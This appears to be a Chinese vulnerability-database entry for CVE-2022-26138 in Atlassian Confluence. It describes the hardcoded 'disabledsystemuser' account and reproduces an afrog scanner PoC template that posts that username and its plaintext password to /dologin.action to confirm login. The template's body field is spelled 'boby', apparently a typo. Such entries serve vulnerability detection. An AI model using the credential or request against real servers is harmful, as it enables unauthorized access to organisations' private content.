CVE-2022-26138: CVE-2022-26138

日期: 2025-09-01 | 影响软件: CVE-2022-26138 | POC: 已公开

漏洞描述

Confluence 服务器和数据中心的 Confluence 应用程序的 Atlassian 问题在 confluence-users 组中创建了一个 Confluence 用户帐户, 用户名是 disabledsystemuser 和一个硬编码密码。知道硬编码密码的远程、未经身份验证的攻击者可以利用此漏洞登录 Confluence 并访问 confluence-users 组中的用户可访问的所有内容。此用户帐户是在安装应用程序的 2.7.34、2.7.35 和 3.0.2 版本时创建的。

PoC代码[已公开]

id: CVE-2022-26138
 
info:   
  name: CVE-2022-26138
  author: zhizhuo
  severity: high
  verified: true
  description: |
   Confluence 服务器和数据中心的 Confluence 应用程序的 Atlassian 问题在 confluence-users 组中创建了一个 Confluence 用户帐户,
   用户名是 disabledsystemuser 和一个硬编码密码。知道硬编码密码的远程、未经身份验证的攻击者可以利用此漏洞登录 Confluence 并访问 
   confluence-users 组中的用户可访问的所有内容。此用户帐户是在安装应用程序的 2.7.34、2.7.35 和 3.0.2 版本时创建的。
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138
 
rules:
  verify:
    request:
      method: POST
      path: /dologin.action
      boby: |
        os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fzhizhuo.action
    expression: response.status == 200 && response.headers.bcontains(b'Location') && response.headers.bcontains(b'zhizhuo.action')
expression: verify()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-26138.yaml

相关漏洞推荐